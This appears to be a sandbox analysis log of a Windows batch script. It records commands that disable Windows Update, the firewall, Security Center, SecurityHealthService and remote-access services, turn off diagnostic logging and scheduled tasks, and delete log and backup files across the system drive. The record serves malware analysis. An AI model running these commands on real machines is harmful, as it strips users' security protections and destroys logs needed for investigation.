C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Microsoft\PolicyManager\default\ApplicationManagement\AllowGameDVR" /v "value" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\PolicyManager\default\ApplicationManagement\AllowGameDVR" /v "value" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe delete "HKCU\SYSTEM\GameConfigStore\Children" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe delete "HKCU\SYSTEM\GameConfigStore\Children" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe delete "HKCU\SYSTEM\GameConfigStore\Parents" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe delete "HKCU\SYSTEM\GameConfigStore\Parents" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /F /FI "IMAGENAME eq SystemSettings.exe"2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "IMAGENAME eq SystemSettings.exe"3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop wuauserv & net stop UsoSvc2⤵
-
C:\Windows\system32\net.exenet stop wuauserv3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
-
C:\Windows\system32\net.exenet stop UsoSvc3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop UsoSvc4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\WindowsUpdate\DoNotConnectToWindowsUpdateInternetLocations" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\WindowsUpdate\DoNotConnectToWindowsUpdateInternetLocations" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\WindowsUpdate\SetDisableUXWUAccess" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\WindowsUpdate\SetDisableUXWUAccess" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\WindowsUpdate\ExcludeWUDriversInQualityUpdate" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\WindowsUpdate\ExcludeWUDriversInQualityUpdate" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\Schedule Scan Static Task" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\Schedule Scan Static Task" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\Start Oobe Expedite Work" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\Start Oobe Expedite Work" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\Schedule Scan" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\Schedule Scan" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\USO_UxBroker" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\USO_UxBroker" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\UpdateModelTask" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\UpdateModelTask" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\WaaSMedic\PerformRemediation" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\WaaSMedic\PerformRemediation" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies security service
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsoSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsoSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DoSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DoSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q C:\Windows\SoftwareDistribution2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c md C:\Windows\SoftwareDistribution2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PrintNotify" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PrintNotify" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Spooler" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Spooler" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c for /f %i in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "PrintWorkflowUserSvc" ^| find /i "PrintWorkflowUserSvc"') do (reg add "%i" /v "Start" /t reg_dword /d "4" /f)2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "PrintWorkflowUserSvc" | find /i "PrintWorkflowUserSvc"3⤵
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "PrintWorkflowUserSvc"4⤵
-
C:\Windows\system32\find.exefind /i "PrintWorkflowUserSvc"4⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PrintWorkflowUserSvc" /v "Start" /t reg_dword /d "4" /f3⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PrintWorkflowUserSvc_1a0b5" /v "Start" /t reg_dword /d "4" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InstallService" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InstallService" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PushToInstall" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PushToInstall" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c for /f %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "UnistoreSvc" ^| find /i "UnistoreSvc"') do (reg add "%I" /v "Start" /t reg_dword /d "4" /f)2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "UnistoreSvc" | find /i "UnistoreSvc"3⤵
-
C:\Windows\system32\find.exefind /i "UnistoreSvc"4⤵
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "UnistoreSvc"4⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UnistoreSvc" /v "Start" /t reg_dword /d "4" /f3⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UnistoreSvc_1a0b5" /v "Start" /t reg_dword /d "4" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ClipSVC" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ClipSVC" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VaultSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VaultSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\StorSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\StorSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies security service
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mpssvc" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mpssvc" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies security service
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UmRdpService" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UmRdpService" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RasAuto" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RasAuto" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EntAppSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EntAppSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SessionEnv" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SessionEnv" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\pla" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\pla" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TroubleshootingSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TroubleshootingSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WerSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WerSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DPS" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DPS" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\diagnosticshub.standardcollector.service" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\diagnosticshub.standardcollector.service" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DiagLog" /v "Start" /t "reg_dword" /d "0" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DiagLog" /v "Start" /t "reg_dword" /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\WdiContextLog" /v "Start" /t reg_dword /d "0" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\WdiContextLog" /v "Start" /t reg_dword /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB" /t REG_DWORD /d "0x33554432" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB" /t REG_DWORD /d "0x33554432" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ShellHWDetection" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ShellHWDetection" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SgrmBroker" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SgrmBroker" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SEMgrSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SEMgrSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DusmSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DusmSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c del /s /f /q %SYSTEMDRIVE%\Windows\Temp\*.*2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q %SYSTEMDRIVE%\Windows\Temp2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c md C:\Windows\Temp2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c del /s /f /q %temp%\*.*2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q %temp%2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c md %temp%2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c del /q /f /s %SYSTEMDRIVE%\Temp\*.*2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c del /q /f /s %SYSTEMDRIVE%\*.log2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c del /q /f /s %SYSTEMDRIVE%\*.bak2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c del /q /f /s %SYSTEMDRIVE%\*.gid2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64 Critical" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64 Critical" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 Critical" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 Critical" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\ApplicationData\appuriverifierdaily" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\ApplicationData\appuriverifierdaily" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\ApplicationData\appuriverifierinstall" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\ApplicationData\appuriverifierinstall" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /Change /TN "Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /Change /TN "Microsoft\Windows\Application Experience\ProgramDataUpdater" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Application Experience\ProgramDataUpdater" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /Change /TN "Microsoft\Windows\Application Experience\StartupAppTask" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Application Experience\StartupAppTask" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\Device Information\Device" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\Device Information\Device" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\DiskFootprint\StorageSense" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\DiskFootprint\StorageSense" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\Feedback\Siuf\DmClientOnScenarioDownload" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\Feedback\Siuf\DmClientOnScenarioDownload" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\Feedback\Siuf\DmClient" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\Feedback\Siuf\DmClient" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\International\Synchronize Language Settings" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\International\Synchronize Language Settings" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\LanguageComponentsInstaller\Installation" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\LanguageComponentsInstaller\Installation" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\LanguageComponentsInstaller\ReconcileLanguageResources" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\LanguageComponentsInstaller\ReconcileLanguageResources" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\Maps\MapsUpdateTask" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\Maps\MapsUpdateTask" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /Change /TN "Microsoft\Windows\Maps\MapsToastTask" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Maps\MapsToastTask" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\PushToInstall\Registration" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\PushToInstall\Registration" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\Setup\SetupCleanupTask" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\Setup\SetupCleanupTask" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\Speech\SpeechModelDownloadTask" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\Speech\SpeechModelDownloadTask" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\WindowsColorSystem\Calibration Loader" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\WindowsColorSystem\Calibration Loader" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\Work Folders\Work Folders Logon Synchronization" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\Work Folders\Work Folders Logon Synchronization" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\AppListBackup\Backup" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\AppListBackup\Backup" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\BrokerInfrastructure\BgTaskRegistrationMaintenanceTask" /DISABLE2⤵
-
